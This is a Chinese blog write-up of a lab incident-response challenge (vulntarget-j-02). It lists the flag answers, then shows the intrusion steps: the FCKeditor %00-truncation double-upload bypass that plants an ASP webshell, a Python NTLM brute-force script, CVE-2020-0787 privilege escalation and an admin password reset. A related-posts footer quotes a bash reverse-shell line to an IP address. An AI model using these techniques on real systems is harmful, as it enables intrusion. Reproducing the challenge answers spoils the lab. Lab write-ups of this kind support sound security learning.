玄机靶场——应急响应-vulntarget-j-02

已于 2025-02-24 09:58:02 修改
阅读量2.3k 收藏 28
点赞数 57
文章标签: 网络
于 2025-02-23 17:43:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhouShaoy/article/details/145812741
版权
1.服务器xuanji用户密码是什么
H6Du4vX97HMhM7T0rtv0
2.hacker添加的恶意用户是什么
admin$
3.hacker添加的计划任务后门,恶意程序名称是什么
cmd.exe
4.hacker添加的恶意服务名称是什么
Redis
5.hacker还添加了一种劫持后门,修改的windows本地可执行文件名称是什么
sethc.exe
6.hacker上传的木马文件路径是什么
请通过iis服务器日志获取haker上传的木马文件访问路径
/upload/image/5(1).asp
不提供,需渗透进入。
第一步使用goby进行全端口探测
发现有3389,5986,8000,18000为可以利用的端口
第二步使用kali里面的dirsearch进行目录扫描,在对18000端口进行目录扫描的时候,扫到了两个txt文本
进行查看,可以知道为 FCKeditor(一个HTML文本编辑器
查找这个编辑器的漏洞利用,使用这两个地址,进行尝试查看版本号
  • /fckeditor/editor/dialog/fck_about.html
  • /ckeditor/CHANGES.html
查看到版本号为2.6.4.1
然后测试FCKeditor上传点

test文件的上传地址

  • FCKeditor/editor/filemanager/browser/default/connectors/test.html
  • FCKeditor/editor/filemanager/upload/test.html
  • FCKeditor/editor/filemanager/connectors/test.html
  • FCKeditor/editor/filemanager/connectors/uploadtest.html
  • 发现只有后面两条存在上传点

brower文件上传地址

  • /FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp
  • /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
  • 但是发现这两个没有进行配置,所以使用上面的text文件上传,进行尝试
这里上传的时候,需要使用到二次上传
fckeditor <= 2.6.8 for asp 运用%00截断,首先上传文件名为shell.asp%00txt,结果为shell.asp_txt,再次上传同名文件,结果为shell(1).asp,成功绕过。
进行%00进行截断
上传这里,发现它把"."和其他字符转义成了"_"
再点一次上传,发现上传成功了一个asp文件,使用这个地址进行连接
可以进行正常连接
在C盘下,发现了一个图片1.png和密码本.xls
这里得到了xuanji这个账户的NTLM哈希值和大概的密码 H????vX97HMhM7T0rtv0
这里需要NTLM哈希值进行爆破
爆破脚本,找到密码: H6Du4vX97HMhM7T0rtv0 
import itertools
import hashlib


def generate_ntlm_hash(password):
    """ 计算字符串的NTLM哈希值 """
    return hashlib.new('md4', password.encode('utf-16le')).hexdigest().upper()


def brute_force():
    target_hash = "F7F2310C1233353705CA169324BCBE37"
    prefix = "H"
    suffix = "vX97HMhM7T0rtv0"
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"  # 可自定义字符集

    # 生成所有可能的4字符组合
    for chars in itertools.product(charset, repeat=4):
        candidate = prefix + ''.join(chars) + suffix
        current_hash = generate_ntlm_hash(candidate)

        if current_hash == target_hash:
            print(f"[+] 找到密码: {candidate}")
            return

    print("[- 未找到匹配的密码")


if __name__ == "__main__":
    brute_force()
因为之前进行端口扫描的时候有个3386端口打开着,所以使用rdp进行登录
2.hacker添加的恶意用户是什么
使用net user进行查看,提交了一遍,发现没有正确的答案
这个时候想起了,去查看一下powershell的历史命令
地址:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
发现hacker删除了他自己建立的恶意用户
所以答案为admin$
3.hacker添加的计划任务后门,恶意程序名称是什么
打开计划任务管理,这里发现一个MyBackdoor的计划任务,查看操作,发现这个cmd.exe的文件路径很奇怪
正常的cmd.exe文件应该是C:\Windows\System32\cmd.exe,所以判断恶意程序的名称为cmd.exe
4.hacker添加的恶意服务名称是什么
sc query state= all 使用这条命令,列出所有服务,将其导入到一个txt文本里面进行分析
Redis:如果系统不需要Redis服务,突然出现可能可疑。
使用sc qc Redis 进行查看,发现它的启动程序又为一个不知名的cmd2.exe程序进行启动的
所以判断Redis为恶意服务名称
5.hacker还添加了一种劫持后门,修改的windows本地可执行文件名称是什么
第五题,劫持后门可能涉及到系统文件替换。比如,utilman.exe被替换为cmd.exe,这样在登录界面可以通过轻松访问功能调出cmd,从而进行系统操作。或者,可能修改了环境变量中的路径,将常见的程序如notepad.exe指向恶意文件。需要检查系统目录中是否有异常的可执行文件,或者查看最近被修改的系统文件的时间戳。
答案可能类似于utilman.exe或者sethc.exe,这些常被用于辅助功能劫持
所以进行尝试,答案为sethc.exe
6.hacker上传的木马文件路径是什么
请通过iis服务器日志获取haker上传的木马文件访问路径
iis的默认路径为C:\inetpub\logs\LogFiles<站点名称>\
但是访问iss服务器日志需要管理员权限,所以需要使用exp进行提权
使用ver进行查看系统版本为 Windows Server 2019
使用CVE-2020-0787进行提权
运行完会弹出一个窗口,使用net user xxx xxx 进行修改管理员账户的密码进行登录
这里登入到管理员权限的账户上
进行对网址目录下的文件机进行扫描,发现一个5(1).asp的木马,不是我传的
对iis日志文件进行查找5(1).asp这串字符
最后在这个日志中找到,得到上传的木马文件访问路径为/uploiad/image/5(1).asp
Zs_OY
关注
应急响应——靶场实践
weixin_46601374的博客
04-21 1万+
唉,我可算直到值守每天12小时看警报是多么怨种的一工作,本以为该结束了,结果又加了一天!!!! 还好我没放弃自己,一直在自学东西(也不是我愿意的,这也不是没有办法嘛,大家都太卷了) 那就自学了学应急响应。不得不说,大佬们是真好呀,我才在日报里说我刚过完应急响应的知识,梳理出流程,就有大佬给我发来了——三个靶场,够我挺过这难熬的两天了。 嘿嘿不能辜负大佬的期望,咱就好好表现吧 目录 先搭个靶场 应急响应的过程 排查网络连接 排查历史命令 排查后门账户 查看特权账户 ...
玄机靶场应急响应第一章webshell查杀WP
qq_46343633的博客
06-04 2065
靶机账号密码 root xjwebshell1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shell github地址的md5 flag{md5}3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径 md5 flag{md5}
勒索病毒——vulntarget应急响应靶场
m0_57594430的博客
11-16 1851
勒索靶场学习!
玄机靶场——应急响应-vulntarget-b-01
ZhouShaoy的博客
02-14 1083
使用cat install.sh进行查看这个脚本,这里是使用宝塔作为控制面板的,在宝塔的脚本里面,可以看到宝塔打开的所以端口命令,与上图进行比较,可以发现81端口不是宝塔默认打开的端口,所以认为黑客是将81端口作为他的监控端口和入口点的。cat access.log查看网页的日志文件,可以发现Nmap,所以黑客使用的是Namp作为探测工具。如上图,一般扫描工具的主机一般是登录的IP地址,所以登录后台的ip地址为192.168.83.1。3、黑客使用了什么工具扫描了日录(格式fag{工具/版本号})
玄机靶场——应急响应-vulntarget-j-01
ZhouShaoy的博客
02-24 411
3.黑客添加的木马文件名称和密码分别是什么,将黑客添加 的木马名称和密码作为flag提交{fag(名称:密码)1.主站进入后台的文件名称(格式flag{xxxxxxxxxx.php})4.黑客攻击机IP地址是多少(因模拟环境故为内网地址)打开小皮查看网页端口,7001打不开,所以为80。木马上传的ip是192.168.112.123。在POST传参找到这个api3.php。2.黑客是从哪个端口上传木马文件的?最后打开发现连接密码为Admin。查看apache日志,找到。
75 应急响应-数据库&漏洞口令检索&应急取证箱
山兔的博客
10-25 257
经常保证工具的使用,保证最新最全的相关工具的使用,这样子可以保证分析的时候更加快捷,所以工具和脚本,他的分类比较复杂,有的是做数据库日志的,有的是系统日志的,有的是中间件日志分析,各种各样的工具脚本,来分析这些特定的东西,不可能说有一个工具能够全部分析到,那只是说综合性工具比较少,都是一些搜索类的检索工具,像elk,spualk这种平台,对各种日志分析到,但是他不提供自动化的分析功能,他只能够帮你快捷的对各种日志进行清晰的探针。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。
玄机靶场 第一章 应急响应- Linux入侵排查
qq_46343633的博客
06-04 1581
1.web目录存在木马,请找到木马的密码提交2.服务器疑似存在不死马,请找到不死马的密码提交3.不死马是通过哪个文件生成的,请提交文件名4.黑客留下了木马文件,请找出黑客的服务器ip提交5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交。
玄机-Wordpress-应急响应-WP
weixin_42467891的博客
02-23 1877
前言,日志分析题目我们要先查看攻击者特征和 ip 等,靶场环境是 nginx 的,我们去找 nginx的日志。通过分析可以得出以下日志可均为攻击日志的特征,该日志使用 webshell 执行了系统命令,以该日志为基准完成改题目。
玄机靶第一章 应急响应-Linux日志分析
qq_46343633的博客
06-04 1850
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用",“分割2.ssh爆破成功登陆的IP是多少,如果有多个使用”,“分割3.爆破用户名字典是什么?如果有多个使用”,"分割4.登陆成功的IP共爆破了多少次5.黑客登陆主机后新建了一个后门用户,用户名是多少这次靶场是用来确定攻击者的相关信息,以便于后期的溯源和编写应急响应报告。
【玄机】应急响应-Linux日志分析
qq_40923603的博客
02-23 4924
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割。2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割。3.爆破用户名字典是什么?如果有多个使用","分割。5.黑客登陆主机后新建了一个后门用户,用户名是多少。4.登陆成功的IP共爆破了多少次。
玄机-第一章 应急响应-webshell查杀
lin__ying的博客
07-27 677
session_start():用于创建或重启一个会话,这是 PHP 木马中常见的功能,用于存储攻击载荷或状态信息。eval()、assert():这些函数用于执行字符串作为 PHP 代码,是 PHP 木马中常见的执行恶意代码的方式。黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx。黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}cat gz.php #查看gz.php文件。
玄机靶场webshell的查杀
来而不往非礼也
05-10 5075
等了好久终于抽到了玄机的靶场邀请码,今天来体验一下,记录下自己的学习过程。靶机账号密码 root xjwebshell1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shell github地址的md5 flag{md5}3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径 md5 flag{md5}
【置顶】:文章合集系列
一只爱吃橙子的羊
02-13 1407
【置顶】:文章合集系列
玄机-应急响应-vulntarget-k-01
m0_63468055的博客
07-12 2175
玄机-应急响应-vulntarget-k-01
应急响应靶场web1】
一纸荒芜的博客
03-14 6312
本文记录一下自己的靶场解题过程 靶场来源:知攻善防实验室
[应急响应]
weixin_47920370的博客
04-22 4604
一、应急响应过程 目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案 保护阶段:直接断网,保护现场,看是否能够恢复数据 分析阶段:对入侵过程进行分析,常见方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等 复现阶段:还原攻击过程,模拟攻击者入侵思路,关注攻击者在系统中应用的漏洞、手法 修复阶段:分析原因后,修补相关系统、应用漏洞,如果存在后门或弱口令,及时清除并整改 建议阶段:对攻击者利用的漏洞进行修补,加强系统安全同时提高安全意识 二、必备知识点 1、熟悉常用的web安
玄机靶场-蚂蚁爱上树
weixin_42467891的博客
02-23 1632
流量分析
玄机靶场--应急响应- Linux入侵排查
weixin_67729650的博客
10-27 1121
进入靶场,开启环境用远程连接工具进行 ssh 连接,本人比较习惯用 xshell,啥都行,只要能连就行开启环境给的账户和 密码进行登录登录进去了这条命令是查找文件内容有 eval(的后缀为.php 的文件,同样可以把.php 改为.jsp,.asp,等。
应急响应-vulntarget-j-01
最新发布
03-16
### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值